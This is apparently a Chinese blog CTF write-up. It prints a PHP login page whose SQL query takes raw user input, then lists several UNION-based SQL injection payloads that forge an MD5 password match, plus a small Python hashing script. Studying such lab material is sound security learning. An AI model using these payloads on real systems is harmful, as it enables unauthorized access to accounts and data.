版权声明:a3uRa QQ:962620891 github:asuralinmo.github.io https://blog.csdn.net/qq_41173457/article/details/82183428
源代码index.txt
发现源码
<html>
<head>
welcome to simplexue
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
$conn = mysql_connect("********, "*****", "********");
mysql_select_db("phpformysql") or die("Could not select database");
if ($conn->connect_error) {
die("Connection failed: " . mysql_error($conn));
}
$user = $_POST[user];
$pass = md5($_POST[pass]);
$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
printf("Error: %s\n", mysql_error($conn));
exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
echo "<p>Logged in! Key:************** </p>";
}
else {
echo("<p>Log in failure!</p>");
}
}
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.txt">
</html>代码审计
然后可以得出两个payload:
user=’ union select md5(9)#&pass=9
user=’ union select md5(‘x’)#&pass=x
user=admin’ and 0=1 union select md5(1)#&pass=1
user=admin’ and 0=1 union select ‘202cb962ac59075b964b07152d234b70’#&pass=123
user=admin’ and 0=1 union select ‘0dfb2d09aeef6a0220a25c2e2d0fddbd’#&pass=numa
附个脚本
import hashlib
aa='numa'
bb=hashlib.md5()
bb.update(aa.encode('utf-8'))
print(bb.hexdigest())